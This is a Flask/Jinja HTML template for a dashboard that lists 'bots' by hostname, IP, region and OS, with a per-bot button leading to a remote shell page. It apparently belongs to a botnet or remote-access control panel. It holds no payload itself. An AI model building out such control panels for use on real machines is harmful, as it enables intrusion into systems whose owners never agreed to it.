{% extends "base.html" %}

{% block title %}Dashboard{% endblock %}

{% block contents %}
<h1>INI DASHBOARD</h1>

<table>
    <tr>
      <th>HOSTNAME</th>
      <th>IP ADDRESS</th>
      <th>REGION</th>
      <th>OS</th>
      <th>ACTION</th>
    </tr>
    {% for bot in bots %}
    <tr>
      <td>{{ bot.hostname}}</td>
      <td>{{ bot.ip}}</td>
      <td>{{ bot.region}}</td>
      <td>{{ bot.os }}</td>
      <td><button onclick=""><i class="fa-solid fa-rotate-right"></i></button><button onclick=""><i class="fa-solid fa-folder"></i></button><button onclick="location.href='{{ url_for('shell', bot_id=bot.bot_id)}}';"><i class="fa-solid fa-terminal"></i></button></th>
    </tr>
    {% endfor %}  
</table> 
{% endblock contents %}